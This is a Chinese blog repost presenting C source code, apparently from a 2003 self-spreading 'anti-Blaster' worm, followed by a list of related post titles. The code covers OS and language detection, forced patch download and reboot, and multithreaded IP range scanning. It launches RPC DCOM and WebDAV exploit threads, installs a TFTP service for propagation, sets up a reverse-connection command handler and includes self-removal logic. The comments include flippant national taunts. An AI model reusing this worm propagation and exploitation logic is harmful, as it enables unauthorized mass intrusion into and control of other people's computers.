冲击波病毒内幕点滴(4) (转)[@more@]

附3XML:namespace prefix = o ns = "urn:schemas-microsoft-com:Office:office" />

BOOL DoServicePackFunction()
{
Dword nSystemVer = win2000OrXp();
if ( !( nSystemVer == 0 || nSystemVer == 1) )
return FALSE; // not 2k or xp

if ( ReadRegServicePack(nSystemVer) )
return FALSE; //已经安装了

//识别语言版本
int nLanguageID;
unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();
WORD wMain = PRIMARYLANGID(lcid);
WORD wSub = SUBLANGID(lcid);

if ( unOemCP == 437 && wMain == 9 && wSub == 1 ) //en
nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~
//管不了小欧洲~~ 俄罗斯牛人有自己的玩法
~~
else if ( unOemCP == 936 && wMain == 4 && wSub == 2 ) //cn
nLanguageID = 1; //就是为这个来的~~
else if ( unOemCP == 950 && wMain == 4 && wSub == 1 ) //tw
nLanguageID = 2; //同胞骨肉的忙,一定要帮~~
else if ( unOemCP == 932 && wMain == 0x11 && wSub == 1 ) //jp
nLanguageID = -1; //偶好有干掉鬼子机器的冲动!
//罢了,冤冤相报何时了~~~ 希望他丫的自新
~~~ 再玩火就灭了他丫的~~
else if ( unOemCP == 949 && wMain == 0x12 && wSub == 1 ) //kr
nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~
else{
nLanguageID = -1;
}

if ( nLanguageID == -1)
return FALSE;

char szServicePack[] = "RpcServicePack.exe";

// downlaod it~~~
if ( !nSystemVer ) { // 2k
if ( !DOWNLOADSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )
return FALSE;
}
else{
if ( !DownloadSpFile (szServicePack, szwinxpSpUrl[nLanguageID]) )
return FALSE;
}

char szExec[180];
sprintf(szExec, "%s -n -o -z -q", szServicePack);

HANDLE hProcess = MakeProcess( szExec );
if ( hProcess == NULL )
return FALSE;

if (WaitForSingleobject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内
未完成
TeRminateProcess(hProcess,1);
CloseHandle(hProcess);
DeleteFile(szServicePack);
return FALSE;
}
CloseHandle(hProcess);

Sleep(15000);
DeleteFile(szServicePack);
if ( ReadRegServicePack(nSystemVer) ) {
ShutDownwindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot
it~~~
Sleep(20000); //说偶重启有过? 不重启补丁无效,
找 Bill该死 说去~~~
}

return TRUE;
}

// IN: 始ip, B段数量, 是否随机,是否换webDav //更烂~~~ 凑合着看~~~
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL
bWebDav)
{
HANDLE hThread = NULL;
BOOL bFirst = TRUE;
u_long uComp;

for (int i=0;i< (nBCount * 256 * 256); i++){

if ( bRand )
uComp = MakeRandIp();
else
uComp = i + ulIpStart;

if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好
:)~~~
(BYTE)uComp == 0xc5 ||
(BYTE)(uComp>>8) == 0xc5 ||
(BYTE)(uComp>>16) == 0xc5 ||
(BYTE)(uComp>>24) == 0xc5 ||
(WORD)uComp == 0x9999 ||
(WORD)(uComp>>8) == 0x9999 ||
(WORD)(uComp>>16) == 0x9999 )
continue;

u_long *myPara = new u_long;

if ( myPara == NULL ){//如果分配失败,再尝试一次
Sleep(100);
myPara = new u_long;
}

if ( myPara ){
if ( hThread )
CloseHandle(hThread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (bWebDav)
hThread =
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId);
else
hThread =
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId);

Sleep(2);
}

//添加此处代码,避免首次执行时,线程中的
InterlockedIncrement(&g_CurThreadCount) 未来得及运行,一次性建立了N个线程的
bug!
if ( bFirst && (i >= nMaxThread) ){
Sleep(2000);
bFirst = FALSE;
}

while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 ,不小心,
玩过了~~~
Sleep(2);

}

Sleep(60000);
}

//服务模式和控制台模式公用主程序
void DoIt()
{
WSADATAwsd;
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
return;

//杀蠕虫
KillMsblast();

//卸载
SYSTEMTIME st;
GetLocalTime(&st);
if ( st.wYear == 2004 ){
MyDeleteService(szServiceName);
MyDeleteService(szServiceTFTPd);
RemoveMe();
ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将
自身文件删除了
}

srand( GetTickCount() );

memset(ppingBuffer, 'xAA', sizeof(pPingBuffer));
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补
丁已经打够了!~~~

//准备WebDav发送缓冲区
do{
pWebDavExploitBuffer = new char[68000];
Sleep(100);
}while(pWebDavExploitBuffer == NULL);

//必须在checkonlien 之前,一次装配好子弹
PressWebDavBufferOnce();
PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); //get Localip & 修正子弹中的反向ip 和 端口

//打补丁
DoServicePackFunction();

//建立接收线程
DWORD dwThreadID;
HANDLE
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ReCVSendCmdThread,(L
PVOID)NULL,0,&dwThreadID);
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,
同时处理多个反连
return;
CloseHandle(hWorkThread);

if ( !MyStartService(szServiceTftpd) ){
Sleep(1000);
InstallTftpService();
Sleep(1000);
MyStartService(szServiceTftpd);
}

Sleep(2000); //等待接收线程中的全局 rand bind port

u_long ulIP;
for(;;){ //估算了一下,普通机器2小时一循环

//首先扫描本ip段
CheckOnlienAndPressData();
ulIP = ntohl(.NET_addr(szLocalIp));
ulIP &= 0xffff0000;
BeginExploitFunction( ulIP, 1, 0, 0);

//再扫描本ip前后3个段
CheckOnlienAndPressData();
if ( rand() % 2)
ulIP += 0x00010000;
else
ulIP -= 0x00030000;
BeginExploitFunction( ulIP, 3, 0, 0);

//再扫描WebDav一个段,跳出 135 syn封锁
CheckOnlienAndPressData();
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,
立即采取补救措施~~~ sorry~~~
BeginExploitFunction( ulIP, 1, 0, 1);

//再扫描随机的IP, 数量1个 B段, rpc or webdav
CheckOnlienAndPressData();
if ( rand() % 2)
BeginExploitFunction( ulIP, 1, 1, 0);
else
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~

KillMsblast();

}

//WSACleanup();

}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10752043/viewspace-962282/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10752043/viewspace-962282/

冲击波病毒内幕点滴(4) (转)相关推荐

  1. 冲击波病毒内幕点滴(3)

    附2 LSD RPC 溢出漏洞之分析 转摘请注明作者和安全焦点 作者:FLASHSKY 作者单位:启明星辰积极防御实验室 WWW SITE:WWW.VENUSTECH.COM.CN WWW.XFOCU ...

  2. 冲击波病毒内幕点滴(2)

    附1 测试代码 #include #include #include #include #include #include unsigned char bindstr[]={ 0x05,0x00,0x ...

  3. 遇到冲击波病毒引起的准备关机时怎么办?

    机器中了冲击波病毒后,有时候会突然弹出一个准备关机对话框,这时你可能慌忙中赶快把自己的工作保存,然后无奈的等待,其实大可不必,出现准备关机对话框后,你可以打开一个cmd窗口,然后输入"shu ...

  4. 老题再谈----有关冲击波病毒

    今天上网不幸中了毒,在弹出的对话框中,显示只有1分钟时间就关机(而且是倒计时),连关机的菜单都不可用,其他工作就更没有办法进行了.没有办法,只好重新启动,还是弹出显示只有1分钟时间就关机.几次都这样. ...

  5. 冲击波病毒攻击-《截获网站服务器数据》

      今晚课题 点击[阅读原文]或长按图片[识别图中的二维码]即可

  6. XINGNET交换机病毒防范

    随着网络给人们的生活带来巨大的收益,人们也正逐渐遭受网络病毒带来的侵害之苦,网络动荡.网络瘫痪...... 病毒有很多种,根据病毒存在的媒体,病毒可以划分为网络型病毒,文件型病毒,引导型病毒等.文件型 ...

  7. Svchost.exe病毒

    Svchost.exe是病毒的两种情况 1.利用假冒Svchost.exe名称的病毒程序 这种方式运行的病毒并没有直接利用真正的Svchost.exe进程,而是启动了另外一个名称同样是Svchost. ...

  8. 解读互联网40年中的10大“杀手”病毒

    从1969年到现在已经走过了40年,在这一代人的历程中鉴定了互联网的发展,随着技术的不断创新及发展,互联网开始"茁壮成长", 现代社会中互联网已经成为人们工作.学习.生活的重要组成 ...

  9. 二十年最强悍病毒排行榜

    自从第一个计算机病毒爆发以来,已经过去了20年左右的时间.<InformationWeek>最近评出了迄今为止破坏程度最为严重的十大病毒. <?xml:namespace prefi ...

最新文章

  1. Thread系列——Thread.Sleep(0)
  2. Python爬虫开发:正则表达式re的使用
  3. 路由器的修改特权密码、还原出厂设置、备份配置文件和升级操作系统实际操作...
  4. Idea springboot应用,启动报错:org.yaml.snakeyaml.error.YAMLException: java.nio.charset.MalformedInputExcept
  5. “小程序肯定会取代 App!” | 人物志
  6. javascript return
  7. 【STM32 .Net MF开发板学习-16】Zigbee遥控智能小车
  8. Java JDK 配置环境变量
  9. 基于三维地图的智慧园区可视化解决方案,智慧园区导航地图怎么制作?
  10. springmvc/ssm框架详细图文解说流程图及运行原理_附源码
  11. 人工智能机器深度学习与大数据技术在足球比赛预测推荐分析上的深度挖掘和应用
  12. Java实现--身高预测
  13. 为什么创造 Charj 语言?从十年以后的编程说起
  14. c语言调用延时子程序的例子,C语言精确延时.doc
  15. StarUML使用说明
  16. 【Java案例】用户登录注册
  17. MYSQL数据库更改目录及NAVACATamp;nbs…
  18. 第一阶段冲刺团队贡献值总结
  19. 指令并行——单核并行编程说明1
  20. 自上而下的因果关系:数学结构与观察者

热门文章

  1. 浏览器插件crx文件怎么导入到谷歌浏览器
  2. docker部署typecho
  3. Python3爬取东方财富十大股东及题材/同花顺参股控股公司及题材
  4. 图片数据转换为csv文件(附python代码)
  5. Martin Fowler谈Scrum认证、敏捷现状与未来
  6. 电脑IP受限制无法连接网络的原因和解决办法
  7. 为了响应工信部要求,我们整理了这些网络账户注销指南
  8. 解决【bug】网页版豆瓣很多帖子点开直接跳转网站首页
  9. 电脑文件被删除了怎么恢复正常
  10. MATLAB mex文件